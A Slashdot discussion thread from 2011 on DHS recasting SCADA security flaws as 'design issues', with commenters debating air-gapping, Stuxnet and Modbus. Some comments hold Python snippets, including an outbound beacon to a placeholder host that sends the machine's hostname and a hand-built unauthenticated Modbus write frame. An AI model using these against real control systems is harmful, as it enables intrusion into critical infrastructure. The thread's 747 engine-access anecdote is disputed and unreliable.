Bug Security IT

SCADA Problems Too Big To Call 'Bugs,' Says DHS

chicksdaddy writes "With the one-year anniversary of Stuxnet upon us, a senior cybersecurity official at the Department of Homeland Security says the agency is reevaluating whether it makes sense to warn the public about all of the security failings of the industrial control system (ICS) and SCADA software used to control the U.S.'s critical infrastructure. DHS says it is rethinking the conditions under which it will use security advisories from ICS-CERT to warn the public about security issues in ICS products. The changes could recast certain kinds of vulnerabilities as 'design issues' rather than security holes. No surprise: independent ICS experts like Ralph Langner worry that DHS is ducking responsibility for forcing changes that will secure the software used to run the nation's critical infrastructure. 'This radically cuts the amount of vulnerabilities in the ICS space by roughly 90%, since the vast majority of security "issues" we have are not bugs, but design flaws,' Langner writes on his blog. 'So today everybody has gotten much more secure because so many vulnerabilities just disappeared.'"
This discussion has been archived. No new comments can be posted.

Comments:
  • by elrous0 ( 869638 ) * on Monday September 26, 2011 @03:44PM (#37519900)

    "Bugs," "security vulnerabilities," "design flaws"--really doesn't matter. They can still blow up an Iranian centrifuge. And I'm pretty sure that means they can blow them up in other countries too, along with just about anything else that depends on a PLC. Stuxnet, as well-intentioned as it may have been for Israeli and U.S. interests, was a wake-up call that goes way beyond any petty Persian pissing contest.

    • Re: (Score:3, Insightful)

      by Anonymous Coward

      "Bugs," "security vulnerabilities," "design flaws"

      It matters to bureaucrats, unfortunately.

      The categorization of these flaws, and whether they are a "bug" or not, can determine by law or policy who is on the hook for the $$$ required to fix the flaw.

      • "Bugs," "security vulnerabilities," "design flaws"

        it matters to beaurocrats, unfortunately.

        the categorization of these flaws, and whether they are a "bug" or not, can determine by law or policy who is on the hook for the $$$ required to fix the flaw.

        That's exactly it. (Make way for the car analogy!) You wouldn't say that a car with glass windows has a "security flaw" in which the interior can be accessed through the use of a ball-peen hammer and 1/2 lb of force. You instead say that it has known security limitations involving vectors X, Y, and Z. If your system (the car) is improperly configured (left unattended in a shitty neighborhood) and subsequently gets burglarized, you would not say that the vendor provided an insufficiently secure car, would you?

        • I will sleep better tonight in Southern California because my electricity [msn.com] and cell phone [nctimes.com] feel good when they're together?

          Or maybe someone at DHS has a funny way of doing their job; but how American citizens were helped after Katrina [aclu.org] is something I still clench my remaining teeth about.
    • Sounds like DHS has hired Dilbert's Pointy Haired Boss.
    • Argh (Score:4, Informative)

      by Anonymous Coward on Monday September 26, 2011 @04:05PM (#37520160)

      We do SCADA systems in the States. We subscribe to several policies regarding SCADA networks:
      1) DO NOT connect your SCADA network to the Internet.
      2) If you must connect for remote access, use a patch cord that you ALWAYS unplug afterward.
      3) DO NOT use your SCADA machines for desktop business purposes - especially on the Internet!
      Argh, the crap that appears in the media. For example, you cannot "infect" a PLC. Why? They don't run Java (or script), or any language recognizable by the Internet community. They don't even run executables, in the sense that PCs do. Their programming is done in a specialized, proprietary language that requires a specialized IDE to manipulate. Write your own? Sure, if you have thousands upon thousands of man-hours handy. Do an open-source IDE? Within 24 hours of posting your project somewhere, the manufacturer will be knocking at your door. PLCs are very, very proprietary, and their makers want them to stay that way.
      Stuxnet infected a PC, causing it to change the signals it was sending to motor speed controllers, thus fouling up a process. Which is why you keep your SCADA PCs as far away from the Internet as you possibly can.
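
      Policy #1 above is easy to audit continuously. A minimal Python sketch of such a check (illustration only; the probe target 8.8.8.8:53 and the 3-second timeout are arbitrary placeholders):

      # isolation_check.py -- crude audit for "no Internet from the SCADA host"
      # Tries one outbound TCP connection to a well-known external address.
      # On a properly isolated host this should fail (timeout or unreachable).
      import socket

      def can_reach_internet(host="8.8.8.8", port=53, timeout=3.0):
          """Return True if an outbound TCP connection succeeds."""
          try:
              with socket.create_connection((host, port), timeout=timeout):
                  return True
          except OSError:
              return False

      if __name__ == "__main__":
          if can_reach_internet():
              print("WARNING: this host can reach the Internet - policy violation")
          else:
              print("OK: no outbound connectivity detected")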

      • Re:Argh (Score:4, Informative)

        by elrous0 ( 869638 ) * on Monday September 26, 2011 @04:11PM (#37520206)

        The Iranians had the same policies. Didn't stop Mossad or whoever from putting it on some Russian contractors' thumb drives and infecting them that way. Not so much of a worry unless you're a high value target. But the problem is that a lot of industrial systems ARE pretty high value targets.

      • Re:Argh (Score:4, Interesting)

        by Zerth ( 26112 ) on Monday September 26, 2011 @04:54PM (#37520642)

        For example, you cannot "infect" a PLC. Why? They don't run Java (or script), or any language recognizable by the Internet community. They don't even run executables, in the sense that PCs do. Their programming is done in a specialized, proprietary language that requires a specialized IDE to manipulate.

        PLC IDEs are pirated in the industry all the time (several are on TPB right now), so don't expect that to stop anyone outside the industry from writing malicious PLC code, let alone a disgruntled employee who has legitimate access. And anyone who is willing to decompile code taken from a decapped ROM is more than able to buy a broken PLC on eBay and fix it up into a testbed.

        Everyone else will just download the exploit from that guy.

      • Re: (Score:2, Interesting)

        by Anonymous Coward

        Mod parent up. As someone working in development of SCADA systems at a large company, I tell that to every customer I meet. We have it in the manual, we take it into account in projects:
        SCADA systems don't belong on the internet. Not the PLCs, not specialized controllers (motion etc.), not the HMI systems or data loggers either.

        In addition to using a cable you can simply unplug, we would typically recommend a VPN router thing between the SCADA system and the internet (cheap or not so cheap, doesn't really matter).

        • by Renraku ( 518261 )

          Alright, let's give a scenario here. Imagine you're a producer of SCADA/PLC/etc bits. You develop and deploy a solution for a company and after a year of testing and making sure everything is running smoothly, you hand over the keys and do a tactical retreat to let them have their damn system. A lot of money changed hands.

          Then the worst happens. They get hacked. Let's say it breaks down a multi-million dollar piece of equipment. Beyond repair. Has to be scrapped.

          Obviously the fault depends on how it

          • While I very much agree with you, at some point it becomes an arms race. There is no such thing as an unhackable system. But you can minimize risks... We have some clients who run a country wide network because their management "needs" the information at head office. While they go through a VPN, it isn't all that secure. Luckily we are a minor vendor and probably won't get dropped in it..

      • by rev0lt ( 1950662 )
        Many PLC implementations are "open" in the sense that the protocol is open and documented. And while most high-power CNC machines aren't vulnerable to internet malware, that doesn't mean that Ethernet/serial/CAN-exposed PLC devices aren't. I haven't worked with PLCs since the late nineties, but I wouldn't be surprised if little to nothing has changed since.
      • by NFN_NLN ( 633283 )

        Funny, you can replace PLC with PS3 and the paragraph still makes sense, except the part about disconnecting from the internet.

        "Argh, the crap that appears in the media. For example, you cannot "infect" a PS3. Why? They don't run Java (or script), or any language recognizable by the Internet community. They don't even run executables, in the sense that PCs do. Their programming is done in a specialized, proprietary language that requires a specialized IDE to manipulate. Write your own? Sure, if you have tho

      • I wish you hadn't posted AC; then at least I would know which contractor to avoid. Quite frankly, your post smells of all the things that cause problems in our industry.

        1) Airgapping isn't a be-all and end-all security method. Actually, it's typically the way people do security when they couldn't be bothered designing a secure system from the ground up. It's the theory that there are only 2 end points and no need for security that got us Modbus, a protocol with no authentication at all which was ported to
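
        To make the Modbus point concrete, here is a rough sketch (illustration only) of a Modbus/TCP "Write Single Register" request built by hand in Python. Notice that nothing in the frame identifies or authenticates the sender; the unit ID, register address, and value below are placeholders.

        # modbus_write_demo.py -- anatomy of an unauthenticated Modbus/TCP write
        # MBAP header + PDU for function 0x06 (Write Single Register). There is
        # no credential, signature, or session field anywhere in the protocol.
        import struct

        def build_write_single_register(transaction_id, unit_id, register, value):
            # PDU: function code 0x06, register address, register value
            pdu = struct.pack(">BHH", 0x06, register, value)
            # MBAP: transaction id, protocol id (0), count of bytes that follow, unit id
            mbap = struct.pack(">HHHB", transaction_id, 0, len(pdu) + 1, unit_id)
            return mbap + pdu

        if __name__ == "__main__":
            frame = build_write_single_register(1, unit_id=1, register=0x0010, value=1500)
            print(frame.hex())
            # Anyone with network reach to TCP port 502 could deliver this frame;
            # nothing in it proves who the sender is.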

      • by AmiMoJo ( 196126 )

        Actually you can brick many PLCs fairly easily without detailed programming knowledge, using tools downloadable from TPB. Configuration fuses are usually a good place to start, and even if they are not one-time programmable there is usually some combination of settings that causes them to become useless (or cook).

        That is true of many microcontrollers too. Apple tried to prevent those kinds of attacks by using cryptography for firmware updates to battery controllers, but the key was accidentally revealed in a

      • >Stuxnet infected a PC, causing it to change the signals it was sending to
        >motor speed controllers, thus fouling up a process. Which is why you keep
        >your SCADA PCs as far away from the Internet as you possibly can.

        Stuxnet actually reprogrammed the PLCs, too. See the analysis at

        http://www.symantec.com/connect/blogs/stuxnet-breakthrough [symantec.com]

    • It all depends on whether you understand the design assumptions of the equipment, and how you establish the point of trust. You can build a secure network of insecure components; it is just infinitely more complicated than making a network of secure components. We end up with a bunch of firewalls on RS-485 links that control device-level access, eliminate distributed password management, and need to set up complicated rules for data access. Once someone gets to the RS-485 layer, they are assumed to be trusted.
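
      A rough sketch of that "firewall on the RS-485 link" idea (illustration only): a filter that forwards a Modbus RTU request to the field bus only if its unit ID and function code are on an allowlist. Serial I/O (e.g. via pyserial) and CRC validation are omitted, and the allowlist values are made up.

      # rtu_filter.py -- allowlist filter for Modbus RTU requests at a gateway
      # RTU frame layout: [unit id][function code][data ...][CRC16 lo][CRC16 hi]
      ALLOWED_UNITS = {1, 2}            # permitted device addresses (placeholder)
      ALLOWED_FUNCTIONS = {0x03, 0x04}  # read holding / input registers only

      def frame_allowed(frame: bytes) -> bool:
          """Decide whether a request frame may be forwarded to the field bus."""
          if len(frame) < 4:            # unit id + function + CRC16 is the minimum
              return False
          unit_id, function = frame[0], frame[1]
          return unit_id in ALLOWED_UNITS and function in ALLOWED_FUNCTIONS

      if __name__ == "__main__":
          read_req = bytes([0x01, 0x03, 0x00, 0x00, 0x00, 0x02, 0xC4, 0x0B])
          write_req = bytes([0x01, 0x06, 0x00, 0x10, 0x05, 0xDC, 0x00, 0x00])  # CRC bytes not checked here
          print(frame_allowed(read_req))   # True  - reads are on the allowlist
          print(frame_allowed(write_req))  # False - writes are blocked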

  • by djkitsch ( 576853 ) on Monday September 26, 2011 @03:56PM (#37520040)

    Some extra info popped up online just a few days ago, posted by a SCADA consultant. It's slightly terrifying, though someone with more SCADA experience than I have would have to verify its accuracy:

    For those who do not know, 747s are big flying Unix hosts. At the time, the engine management system on this particular airline was Solaris based. The patching was well behind and they used telnet, as SSH broke the menus and the budget did not extend to fixing this. The engineers could actually access the engine management system of a 747 en route. If issues are noted, they can re-tune the engine in the air.

    The issue here is that all that separated the engine control systems and the open network was NAT-based filters. There were (and as far as I know this is still true today) no extrusion controls. They filter incoming traffic, but all outgoing traffic is allowed. For those who engage in pen testing and know what a shoveled shell is... I need not say more.

    More here: https://www.infosecisland.com/blogview/16696-FACT-CHECK-SCADA-Systems-Are-Online-Now.html [infosecisland.com]
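
    The "no extrusion controls" point is the whole story: a NAT or ingress filter does nothing once a host on the inside initiates the connection itself. A benign stand-in for the shoveled shell, just to show the direction of the handshake (illustration only; 192.0.2.50:4444 is a placeholder listener):

    # outbound_beacon.py -- why ingress-only filtering is not a control
    # A compromised inside host simply connects *out*; the attacker then talks
    # back over the established session, and no inbound rule is ever consulted.
    import socket
    import platform

    def phone_home(host="192.0.2.50", port=4444, timeout=5.0):
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(platform.node().encode() + b" is reachable\n")

    if __name__ == "__main__":
        try:
            phone_home()
        except OSError as err:
            print("egress blocked or listener absent:", err)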

    • by LWATCDR ( 28044 )

      Maybe you should not believe everything that you read.
      "Nearly all SCADA systems are online. The addition of a simple NAT device is NOT a control. Most of these systems are horribly patched and some run DOS, Win 95, Win 98 and even old Unixs. Some are on outdated versions of VMS. One I know of is on a Cray and another is on a PDP-11."

      Ummm, a SCADA control system on a Cray? Really? Where?
      A PDP-11, maybe, but a Cray?
      Also, the system you mentioned cannot be changed while in flight. Maybe it could be bypassed, but then ma

      • by __aaqvdr516 ( 975138 ) on Monday September 26, 2011 @04:30PM (#37520424)

        I can only speak for US Navy submarines. There are no connections from any reactor systems to any network of any kind.

        • by LWATCDR ( 28044 )

          I was thinking of the other networks. I know that the Virginia class uses a COTS network for a lot of systems. I was using that as an example because, let's face it, when you're down no one is logging into you at all. As you know, subs at depth are pretty cut off, well, SSBNs anyway. They can get messages, but only at a very slow rate.

          • by Svartalf ( 2997 )

            The only concern there would be a trojan that was snuck into the development code. If there are any launch or reactor controls that receive the low-speed comms, you could still do a remote exploit that way.

        • by Svartalf ( 2997 )

          Heh... I'd dearly hope that the electric boats had air-gapped control systems... :-D

        • Re: (Score:2, Insightful)

          And that is the only sensible approach to take. If the world weren't filled with cheap bastards posing as CEOs and economics experts, there would be a human hand at all critical controls, nationwide. The only networking necessary would be the sound-powered phone on the operator's head.

        • by adolf ( 21054 )

          I can only speak for US Navy submarines. There are no connections from any reactor systems to any network of any kind.

          So the reactor systems are operated manually, by people turning valves and pulling levers?

          That must be a steampunk's idea of heaven.

          (The above is written with a firm dose of sarcasm. While I'm reasonably sure you meant something very different, "any network of any kind" is literally so broad that it might be construed to include even a mechanical linkage of moderate complexity.)

  • by AtariDatacenter ( 31657 ) on Monday September 26, 2011 @03:58PM (#37520068)

    SCADA? I don't care about it. Not directly. But the problem is that once the government says, "These aren't vulnerabilities or security holes. These are design issues," you've set the example, and other software vendors are going to follow.

    Example: "The denial of service attack against your application is not a security vulnerability, it is just a design issue that everything locks up for a while if it gets an incoming packet, and tries to resolve the IP address against its authoritative DNS server while that is DNS server is offline. We only do security fixes on old products / old releases. Sorry."

    "Design issue, not a security vulnerability" is not a distinction you want easily drawn. Others will follow a government example if it is an easy out.

    • Re: (Score:2, Interesting)

      by Anonymous Coward

      Trust me, almost everything you have come to depend on in terms of outside resources or outside facilities, directly or indirectly, involves SCADA. Almost. Intelligent cars use unencrypted, insecure Ethernet connections, often with some form of insecure wireless connection in there somewhere. That's not SCADA, merely designed just as badly.

      Society is riddled with interdependencies. If you thought Red Hat packages could put you through dependency hell, you've not looked too closely at the systems in the real

    • Personally, I think a design flaw is a much more damning claim to make about your product than a bug report. A bug is a low-level implementation issue or oversight. A design flaw means your product is rubbish from the ground up. I would MUCH rather someone say my software had a bug than that there were design issues. I doubt this is going to be a trend that catches on. The only way I think it could possibly help a company to make such a damning claim would be if it took the words vulnerability or security

    • by maxume ( 22995 )

      Right, because no software vendors ship software with disclaimers to the effect of "This software is unsuitable for any purpose".

      Oh wait, they all do.

      Microsoft doesn't patch security vulnerabilities because they are unable to pass them off as design flaws without the help of government; they patch security vulnerabilities because they know they need to, or they will face even greater user erosion.

    • We'd rather get back to feeling up 5-year-olds and people's Afros than address infrastructure and industries that are highly vulnerable to malicious hacking that could affect the safety and well-being of thousands.

      They're so paranoid about 3 oz of liquid, but what about industrial controls at petrochemical or other large chemical plants, where thousands of gallons of chemicals could be blown up or caused to release hazardous materials?

      I'm just sayin'
    • Unfortunately they are right. Much of the industry is based on standards and protocols which were created by one vendor and adopted by others long before the internet reared its ugly head. Many of the fundamental security issues in SCADA systems are failures of design. They aren't bugs because they work 100% as intended.

      When you design protocols which are normally used to communicate between physically secure devices, and then open them up on a network to PCs which are now exposed to the open world (be it v

  • by Anonymous Coward

    SCADA systems and PLCs are a hacker's dream.

    It's equipment using protocols that are at least 30 years old, with no security in mind at all. Furthermore, the equipment cannot be turned off or patched, or else your factory and/or safety system will no longer work.

    And the worst part is that after setting everything up, you just leave it be when it finally works...

    I agree that they are design flaws and not bugs. But the industry's only mentality is to make it work; there is no security aspect during the entire process.

    Buyers are no

    • That's because PLCs weren't supposed to be networked; the core code was never designed with security in mind, because the devices are supposed to be programmed, then parked somewhere and never messed with again.

      • by AK Marc ( 707885 )
        And it's a critical design flaw to assume, in today's age, that a large system of networked devices will *never* be connected to any network, ever.
        • Chances are that code is recycled from old products to new, ported forward with minute tweaks for the current hardware platform, since management can't see the value of starting from scratch; if anything, starting anew is considered a liability.

          • by AK Marc ( 707885 )
            Which is a fundamental problem. Whether you want to call it a design problem or a business problem, it isn't a "bug" when managers sat around and specifically decided to make something that they knew was incompatible with the expected use of that product.
  • by dkleinsc ( 563838 ) on Monday September 26, 2011 @04:05PM (#37520158) Homepage

    Making code secure is expensive. When these systems were designed, they were not going to be connected to any outside system, and thus were not designed securely because in order to do anything really bad you'd need to physically access the machine, which meant getting past security guards, cameras, etc without anybody noticing. Nobody could justify the expense of doing things right the first time.

    Then somebody with no technical background comes along and says "Why can't we manage this system from our office desktops?"

    • Also, how much code is tacked onto older code, making lots of hacks and other security holes more likely?

      Now, who wants to pay to rewrite the system from the ground up to make it secure, or do you want to do it cheap and just patch over the bad design?

    • by AmiMoJo ( 196126 )

      Then somebody with no technical background comes along and says "Why can't we manage this system from our office desktops?"

      It's more like industrial processes moved on, people realised they could increase yields or make something new by having more advanced control systems and so asked for a solution. Not necessarily from the people who supplied the SCADA system either. It came down to a choice between replacing the whole system with one designed for that type of networking and control or just tacking it on to the existing one, and simple economics combined with some vague assurances about physical security won.

  • That isn't a bug, it's a feature. It works that way by design!
  • I use 'design flaw' for bugs that can't be corrected without rewriting the whole code. Software with design flaws is not called 'bug-free', but 'defective by design'.
  • by Runaway1956 ( 1322357 ) on Monday September 26, 2011 @04:43PM (#37520548) Homepage Journal

    When I look at DHS, I can't find a single area in which they are competent. They can't seal the border, they can't ensure that terrorists are denied entry to our aircraft, they can't intercept a terrorist. What in hell CAN they do? Suddenly, they are in the business of issuing cyber security warnings?

    The one and only thing that they MIGHT be able to do correctly is to tell businesses to observe best-practice advice from the professionals. Beyond that - I expect nothing.

    Oh yeah, if they can grasp the concept, they might push the idea of strict air gapping.

    • by Anonymous Coward

      I wouldn't want DHS to be 100% successful at the "can'ts" in your list. 100% success means sealing the borders and shutting down the airlines. I would want to be able to leave the jail-of-a-nation you are advocating for. We fairly quickly wouldn't have a very large economy if we had no trade after closing the borders. I don't agree with everything DHS does, but usually there is some kernel of logic to the solutions they use. Too many programs are there to make us feel good, not fundamentally improve

      • The point is - we don't even air gap our critical stuff. Joe Sixpack can minimize his porn video over at meattube, log into his control systems, make adjustments, then maximize his meat video again. Iran is the lesson to be learned, but we don't even attempt to learn from it.

        Now, if we properly air gapped all of our infrastructure, then prohibited any USB media, prohibited any floppies (where applicable), AND prohibited all CD/DVD other than official copies issued by competent authority - then we could sa

    • by dbIII ( 701233 )
      They can shovel money around faster than anybody else. It's now just a big, pointless welfare operation for those that signed on, and too big to be killed off by anyone who wants to continue a political career.
    • When I look at DHS, I can't find a single area in which they are competent. They can't ... . What in hell CAN they do? Suddenly, they are in the business of issuing cyber security warnings?

      They DID, a few years ago, issue a warning to businesses to migrate off Windows and other Microsoft products, due to their security flaws and the resulting vulnerability of the US private-sector infrastructure to attack.

      Of course they managed to hide this warning under a bushel rather than pressure the executives to actua

    • DHS is marginally yet effectively competent in advancing Big Brother. While not completely explicit in their charter, I suspect it's the mission. Too much of the rest is standard your-government-loves-you bureaucratic bullshit: building fiefdoms, rice bowls, revolving doors; an employment program for intellectual and moral drones; a new repository of, and for, those with nothing better to do in life than increase their power over others.

      Of course it's also possible that at this late hour my viewpoint is

  • Dear DHS Secretary Janet Napolitano: Please resign. From recent events, it is painfully clear that you do not understand that one of the most fundamental aspects of security is not revealing your methods to the public. This includes telling us whether or not you plan on telling the whole truth about security flaws in the future. The announcement implies two things: 1. Your future comments might not be entirely truthful. 2. DHS's previous comments about cyber security in the past were 100% truthful, to the
    • From recent events, it is painfully clear that you do not understand that one of the most fundamental aspects of security is not revealing your methods to the public.

      Apparently Linus Torvalds does not understand that either.

  • Aren't all bugs just "design flaws"?
    • by AK Marc ( 707885 ) on Monday September 26, 2011 @06:00PM (#37521274)
      If you design a car with a gas tank that dislodges from the filler neck in a moderate crash, spilling fuel and turning a survivable minor-injury crash into a life-threatening incident, then you designed it wrong. If you purposefully design it to keep the filler neck attached in all crashes, but a part sourced for it did not meet specifications, resulting in inadvertent detachment, then you have a "bug" that was most certainly not a design flaw, but a build (coding) flaw.

      One is a purposeful choice to make an inferior product to save time/money. The other is a properly designed product with an unintentional flaw. Sadly, deliberate negligence is tolerated (and seemingly encouraged), while unintended flaws are punished more harshly. But that's government security for you. Appearance is much more important than effect.
    • by tqk ( 413719 )

      Aren't all bugs just "design flaws"?

      Vince?!? WTF are you doing here?!?

      Okay, maybe you're not him, but you sound like him (a *doofus* manager I once worked with). So I feel somewhat obligated to educate you.

      This Waterfall method [wikipedia.org] article says it was first alluded to in 1956 (two years after I was born, fwiw). I only learned about it in the late '80s in programmer school. "Analysis, Design, Implementation, Testing, Maintenance." You're supposed to iterate between them (at any phase you're in, when you find a flaw or learn something new, you go back an

  • There, see, you don't have to call it a bug.

    It's still bad and customers still need to be told so they can work the design flaw into their operational plans.

  • It's called an air gap firewall. Don't connect shit to the Internet that has no business being connected to the Internet. This means having strict policies in place, such as "connecting an uncertified wifi-capable laptop to the SCADA network shall result in the violator being shot, repeatedly, in the balls or other sensitive region."

    • It's called an air gap firewall. Don't connect shit to the Internet that has no business being connected to the Internet.

      Not being connected to the Internet didn't keep Stuxnet out of Iran's centrifuge SCADA systems. It propagated as a sneakernet virus from consultants' laptops to the machines on the air-gapped network which controlled and monitored the PLCs.

      • At least it would make it more difficult. While working on NYC's subways, I found a lot of their SCADA systems were networked into the local station and the overall control center. Which in general is OK, since as of 8 years ago there were no outside connections, but if someone could sneaker in a virus... there could be some issues.
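
        For the sneakernet vector, even a crude hygiene check on the HMI stations helps. A sketch (illustration only; Windows-style drive letters D: through Z: assumed) that flags autorun.inf and top-level executables on removable drives; real controls would go further, e.g. device whitelisting or banning USB media outright:

        # usb_hygiene.py -- crude sweep of removable drives on an HMI station
        import os
        import string

        SUSPECT_NAMES = {"autorun.inf"}
        SUSPECT_EXTS = {".exe", ".scr", ".dll", ".lnk"}

        def scan_drive(root):
            findings = []
            try:
                for name in os.listdir(root):
                    lower = name.lower()
                    if lower in SUSPECT_NAMES or os.path.splitext(lower)[1] in SUSPECT_EXTS:
                        findings.append(os.path.join(root, name))
            except OSError:
                pass  # drive not present or not ready
            return findings

        if __name__ == "__main__":
            for letter in string.ascii_uppercase[3:]:  # D: through Z:
                for hit in scan_drive(letter + ":\\"):
                    print("suspicious file:", hit)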

  • Seems a fitting time to roll out the old Microsoft joke, but with a twist:

    How many DHS analysts does it take to change a light bulb?
    None, because DHS defines darkness as the new standard.
  • It is my belief that most vulnerabilities are 'design issues' and not just "security holes" that can be patched over.

    I have been studying OS design now for almost 20 years. I think most of these designs were fine when you were just trying to hack something together, but with everything now interconnected, they were simply never built for that.

    I have an OS design I have been working on for the past 10 years, Amorphous OS, that is intended to solve almost every issue I've seen talked about.

    Most come from just having a common

  • Design flaws are not bugs. Hmmmm. Maybe if I say it the other way: bugs are not design flaws. Nope. Still not making sense. Maybe I need to put on a suit and tie.
